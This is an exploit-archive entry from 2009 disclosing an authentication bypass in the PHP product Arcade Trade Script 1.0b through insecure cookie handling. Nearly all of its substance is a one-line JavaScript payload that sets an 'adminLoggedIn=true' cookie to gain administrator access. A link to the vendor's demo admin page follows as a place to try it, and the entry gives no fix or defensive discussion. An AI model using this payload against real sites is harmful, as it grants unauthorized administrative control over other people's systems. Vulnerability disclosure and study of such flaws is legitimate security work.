id: 5680
date: 08/23/2009
title: Arcade Trade Script 1.0b (Auth Bypass) Insecure Cookie Handling Vuln
author: Mr.tro0oqy
cves: 

====================================================================
Arcade Trade Script 1.0b (Auth Bypass) Insecure Cookie Handling Vuln
====================================================================


======================================================================
[»] Script : Arcade Trade Script v.1.0 Insecure Cookie Handling Vuln

[»] Language : php  

[»] Script site : http://www.arcadetradescript.com

[»] Founder: Mr.tro0oqy <- from Yemen

======================================================================
exploit:
--------

javascript:document.cookie="adminLoggedIn=true;path=/";

--------
demo:
--------

http://www.arcadetradescript.com/demo/admin/
--------



#  0day.today [2023-03-24]  #